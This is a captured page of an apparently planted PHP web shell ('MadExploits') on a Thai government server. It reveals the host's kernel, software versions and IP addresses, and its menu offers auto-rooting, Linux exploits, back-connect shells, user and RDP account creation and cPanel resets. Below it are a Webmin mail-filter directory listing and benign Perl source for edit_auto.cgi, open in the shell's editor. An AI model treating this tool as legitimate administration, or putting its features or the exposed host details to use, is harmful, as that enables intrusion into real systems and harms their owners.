Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
filter /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
2.96
KB
-rw-r--r--
aliases-lib.pl
7.93
KB
-rwxr-xr-x
autoreply-file-lib.pl
2.28
KB
-rwxr-xr-x
config
218
B
-rw-r--r--
config.info
489
B
-rw-r--r--
config.info.ca
556
B
-rw-r--r--
config.info.ca.UTF-8
575
B
-rw-r--r--
config.info.cz
344
B
-rw-r--r--
config.info.cz.UTF-8
370
B
-rw-r--r--
config.info.de
598
B
-rw-r--r--
config.info.de.UTF-8
598
B
-rw-r--r--
config.info.el
264
B
-rw-r--r--
config.info.hu
0
B
-rw-r--r--
config.info.nl
584
B
-rw-r--r--
config.info.nl.UTF-8
584
B
-rw-r--r--
config.info.no
527
B
-rw-r--r--
config.info.no.UTF-8
527
B
-rw-r--r--
config.info.pl
580
B
-rw-r--r--
config.info.pl.UTF-8
604
B
-rw-r--r--
delete.cgi
431
B
-rwxr-xr-x
down.cgi
261
B
-rwxr-xr-x
edit.cgi
8.97
KB
-rwxr-xr-x
edit_auto.cgi
3.11
KB
-rwxr-xr-x
edit_forward.cgi
1.18
KB
-rwxr-xr-x
filter-lib.pl
17.71
KB
-rwxr-xr-x
index.cgi
4.33
KB
-rwxr-xr-x
module.info
260
B
-rw-r--r--
module.info.ca
109
B
-rw-r--r--
module.info.ca.UTF-8
121
B
-rw-r--r--
module.info.cz
39
B
-rw-r--r--
module.info.cz.UTF-8
52
B
-rw-r--r--
module.info.de
114
B
-rw-r--r--
module.info.de.UTF-8
126
B
-rw-r--r--
module.info.hu
81
B
-rw-r--r--
module.info.hu.UTF-8
104
B
-rw-r--r--
module.info.ms_MY
109
B
-rw-r--r--
module.info.ms_MY.UTF-8
121
B
-rw-r--r--
module.info.nl
34
B
-rw-r--r--
module.info.nl.UTF-8
40
B
-rw-r--r--
module.info.no
37
B
-rw-r--r--
module.info.no.UTF-8
43
B
-rw-r--r--
module.info.pl
114
B
-rw-r--r--
module.info.pl.UTF-8
130
B
-rw-r--r--
move.cgi
1.61
KB
-rwxr-xr-x
save.cgi
7.63
KB
-rwxr-xr-x
save_auto.cgi
2.73
KB
-rwxr-xr-x
save_forward.cgi
959
B
-rwxr-xr-x
up.cgi
259
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_auto.cgi
#!/usr/bin/perl # Show a page for just adding, editing or removing an autoreply message require './filter-lib.pl'; &ReadParse(); &ui_print_header(undef, $text{'auto_title'}, ""); # Get the autoreply filter, if any @filters = &list_filters(); ($filter) = grep { $_->{'actionreply'} && $_->{'nocond'} } @filters; $dis = !$filter; print &ui_form_start("save_auto.cgi", "post"); print &ui_table_start($text{'auto_header'}, "width=100%", 2); # Autoreply enabled? @names = ( "reply" ); $dis1 = &js_disable_inputs(\@names, [ ]); $dis2 = &js_disable_inputs([ ], \@names); print &ui_table_row($text{'auto_enabled'}, &ui_radio("enabled", $filter ? 1 : 0, [ [ 1, $text{'yes'}, "onClick='$dis2'" ], [ 0, $text{'no'}, "onClick='$dis1'" ] ])); # Message print &ui_table_row($text{'auto_reply'}, &ui_textarea("reply", $filter ? $filter->{'reply'}->{'autotext'} : "", 5, 80, undef, $dis)); # Subject line print &ui_table_row($text{'auto_subject'}, &ui_opt_textbox("subject", $filter ? $filter->{'reply'}->{'subject'} : "", 60, $text{'default'}." (Autoreply to \$SUBJECT)")); # Character set $cs = $filter ? $filter->{'reply'}->{'charset'} : &get_charset() eq $default_charset ? undef : &get_charset(); $csmode = $cs eq &get_charset() ? 2 : $cs ? 0 : 1; print &ui_table_row($text{'auto_charset'}, &ui_radio("charset_def", $csmode, [ [ 1, $text{'default'}." ($default_charset)" ], &get_charset() eq $default_charset ? ( ) : ( [ 2, $text{'auto_charsetdef'}. " (".&get_charset().")" ] ), [ 0, $text{'auto_charsetother'} ] ])." ". &ui_textbox("charset", $csmode == 0 ? $cs : "", 20)); # Period $r = $filter ? $filter->{'reply'} : undef; if (!$config{'reply_force'}) { $period = !$filter ? 60 : $r->{'replies'} && $r->{'period'} ? int($r->{'period'}/60) : $r->{'replies'} ? 60 : undef; if ($config{'reply_min'}) { # Forced on, with a minimum print &ui_table_row($text{'auto_period'}, &ui_textbox("period", $period, 3). " ".$text{'index_mins'}); } else { # Can turn off reply tracking print &ui_table_row($text{'auto_period'}, &ui_opt_textbox("period", $period, 3, $text{'index_noperiod'}). " ".$text{'index_mins'}); } } # Start and end dates if ($r && $r->{'autoreply_start'}) { @stm = localtime($r->{'autoreply_start'}); $stm[4]++; $stm[5] += 1900; } if ($r && $r->{'autoreply_end'}) { @etm = localtime($r->{'autoreply_end'}); $etm[4]++; $etm[5] += 1900; } print &ui_table_row($text{'index_astart'}, &ui_radio("start_def", @stm ? 0 : 1, [ [ 1, $text{'index_forever'} ], [ 0, $text{'index_ondate'} ] ])." ". &ui_date_input($stm[3], $stm[4], $stm[5], "dstart", "mstart", "ystart")." ". &date_chooser_button("dstart", "mstart", "ystart")); print &ui_table_row($text{'index_aend'}, &ui_radio("end_def", @etm ? 0 : 1, [ [ 1, $text{'index_forever'} ], [ 0, $text{'index_ondate'} ] ])." ". &ui_date_input($etm[3], $etm[4], $etm[5], "dend", "mend", "yend")." ". &date_chooser_button("dend", "mend", "yend")); print &ui_table_end(); print &ui_form_end([ [ undef, $text{'save'} ] ]); &ui_print_footer("", $text{'index_return'});
Close